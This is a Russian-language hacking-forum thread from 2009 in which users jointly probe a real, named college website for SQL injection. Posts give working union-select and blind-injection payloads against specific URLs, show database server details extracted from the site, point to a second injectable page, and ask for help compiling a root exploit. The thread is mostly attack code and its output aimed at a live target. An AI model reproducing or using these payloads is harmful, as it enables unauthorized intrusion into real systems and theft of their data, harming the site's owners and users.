ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.12.2009, 23:16
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Сообщение от R@X
Спасибо буду знать 
подскажите плиз еще что это за хэш $P$BXnTLgitAWI18nma9N56AwYv/HbpUf0 MD5(Wordpress)
|
|
|
11.12.2009, 03:43
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447
Репутация:
123
|
|
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27
Как можно ее раскрутить, сори за нубовский вопрос. Вернее как подобрать количество полей.
Спасибо.
|
|
|
|
11.12.2009, 03:50
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от hackmen
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27
Как можно ее раскрутить, сори за нубовский вопрос. Вернее как подобрать количество полей.
Спасибо.
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27+group+by+11--%20+
Выше уже ошибка 
|
|
|
|
11.12.2009, 03:59
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447
Репутация:
123
|
|
Сообщение от m0Hze
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27+group+by+11--%20+
Выше уже ошибка Спасибо.
!!!А где про эти методы можно подробнее почитать?
Грабли =)
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27+union+select+1,2,3,4,5,6, 7,8,9,10,11--%20+
Что не так? )
|
|
|
|
11.12.2009, 17:34
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от hackmen
Спасибо.
!!!А где про эти методы можно подробнее почитать?
Грабли =)
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27+union+select+1,2,3,4,5,6, 7,8,9,10,11--%20+
Что не так? )
Как правильно сказал Spyder - там Blind:
Код:
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+or+1=1+and+substring(version(),1,1)=5--+
Чтобы понять, почему именно пятая ветка, просто подставь 3, а затем 4 вместо 5 - ошибок не увидишь, увидишь разницу в тексте на странице. Которая уникальна только при 5
Тулза схавала на раз:
Код:
@@version_compile_os: Win64
database(): trccweb
@@tmpdir: C:\Windows\TEMP
version(): 5.1.35-community
user(): webuser@localhost
@@basedir: C:\Program Files\MySQL\MySQL Server 5.1\
@@datadir: C:\ProgramData\MySQL\MySQL Server 5.1\Data\
про toolza 1.0 думаю тебе рассказывать не нужно, метод GET, режим NORMAL, настройки:
Код:
$method = 0;
$bl_url = "http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+or+1=1";
$bl_filtr = "--+";
$bl_plus = "+";
$bl_error = "HEARTSAVER FIRST";
$bl_error_type = 1;
Нажал на кнопку и зохавал сайт
Последний раз редактировалось Pashkela; 11.12.2009 в 17:38..
|
|
|
|
11.12.2009, 18:10
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от hackmen
Спасибо.
!!!А где про эти методы можно подробнее почитать?
Грабли =)
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27+union+select+1,2,3,4,5,6, 7,8,9,10,11--%20+
Что не так? )
Здесь блинд, но если тебя интересует конкретно этот сайт, то там рядышком есть и обычная скуля...
Код:
http://www.trcc.cc.mo.us/display_news_photo.php?ID=-1'+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11%23
|
|
|
|
11.12.2009, 04:01
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
https://forum.antichat.ru/threadnav43966-1-40.html
тут
слепая скуля, читай статейки
|
|
|
|
11.12.2009, 07:33
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447
Репутация:
123
|
|
Что-то много вопрос от меня сегодня...
Запрос вида
+union+select+1,convert(version()+using+latin1),3, 4,5,6,7,8,9,10,11,12,13,14--
Выдает ошибку
Illegal mix of collations for operation 'UNION'
Если использовать просто
+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,1 3,14--
То
Illegal mix of collations (latin1_general_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
Как такое побороть?
Последний раз редактировалось hackmen; 11.12.2009 в 07:38..
|
|
|
|
11.12.2009, 07:46
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от hackmen
Что-то много вопрос от меня сегодня...
Запрос вида
+union+select+1,convert(version()+using+latin1),3, 4,5,6,7,8,9,10,11,12,13,14--
Выдает ошибку
Illegal mix of collations for operation 'UNION'
Если использовать просто
+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,1 3,14--
То
Illegal mix of collations (latin1_general_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
Как такое побороть?
AAAAAAAAAAAAAAAA 
Уже какой раз.
AES_DECRYPT, AES_ENCRYPT!
unhex, hex.
convert.
|
|
|
|
11.12.2009, 16:53
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
компилирую етот сплойт _http://forum.antichat.ru/thread160377.html ! пишу
выдает:
Код:
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '##' token
ls.c:1: error: syntax error at '#' token
ls.c:2:3: invalid preprocessing directive #EDB
ls.c:3:3: invalid preprocessing directive #CVE
ls.c:4:3: invalid preprocessing directive #Title
ls.c:5:3: invalid preprocessing directive #Author
ls.c:6:3: invalid preprocessing directive #Published
ls.c:7:3: invalid preprocessing directive #Download
ls.c:8:3: invalid preprocessing directive #Download
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '##' token
ls.c:9: error: syntax error at '#' token
ls.c:10: error: syntax error before '&' token
ls.c:16: error: syntax error before "long"
ls.c:27: warning: data definition has no type or storage class
ls.c:28: error: syntax error before "r00tbox"
ls.c:28: error: syntax error at '#' token
ls.c:30: error: stray '@' in program
ls.c:31: error: `kcope' undeclared here (not in a function)
ls.c:31: error: called object is not a function
ls.c:31: error: syntax error before "gid"
ls.c:36:20: warning: multi-character character constant
ls.c:38:10: warning: character constant too long for its type
ls.c:40:10: warning: character constant too long for its type
ls.c:42:10: warning: character constant too long for its type
ls.c:43: warning: data definition has no type or storage class
ls.c:44: warning: data definition has no type or storage class
ls.c:44: error: syntax error before "value"
ls.c:45: warning: data definition has no type or storage class
ls.c:45: error: syntax error before "value"
ls.c:46: warning: data definition has no type or storage class
ls.c:46: error: syntax error before "value"
ls.c:47: warning: data definition has no type or storage class
ls.c:47: error: syntax error before "value"
ls.c:48: warning: data definition has no type or storage class
ls.c:48: error: syntax error before "value"
ls.c:50:3: invalid preprocessing directive #uname
ls.c:51: error: syntax error at '#' token
ls.c:53: error: stray '@' in program
ls.c:54: error: redefinition of 'uid'
ls.c:31: error: previous definition of 'uid' was here
ls.c:54: error: called object is not a function
ls.c:54: error: syntax error before "gid"
ls.c:55:3: invalid preprocessing directive #cat
ls.c:56:3: invalid preprocessing directive #$FreeBSD
ls.c:95:2: invalid preprocessing directive #!
In file included from /usr/include/sys/_types.h:33,
from /usr/include/stdio.h:45,
from ls.c:100:
/usr/include/machine/_types.h:75: error: syntax error before "__int_least8_t"
ls.c:113: error: syntax error before "gcc"
In file included from /usr/include/sys/types.h:44,
from /usr/include/unistd.h:41,
from ls.c:115:
/usr/include/machine/endian.h:158: error: syntax error before "static"
In file included from /usr/include/unistd.h:41,
from ls.c:115:
/usr/include/sys/types.h:64: error: syntax error before "int8_t"
In file included from ls.c:115:
/usr/include/unistd.h:329: error: conflicting types for 'execl'
/usr/include/unistd.h:329: note: a parameter list with an ellipsis can't match a
n empty parameter name list declaration
ls.c:110: error: previous implicit declaration of 'execl' was here
ls.c:126: error: syntax error before "gcc"
ls.c:127:45: too many decimal points in number
ls.c:128:11: too many decimal points in number
ls.c:128:28: too many decimal points in number
ls.c:129:6: warning: no newline at end of file
как исправить ошыбку?
спасибо
НЕПОНЯЛ ЕТО ПИСАЛ НЕ Я!!!!!!!!!!!!!!!!!!!!!^
Последний раз редактировалось 547; 11.12.2009 в 17:34..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
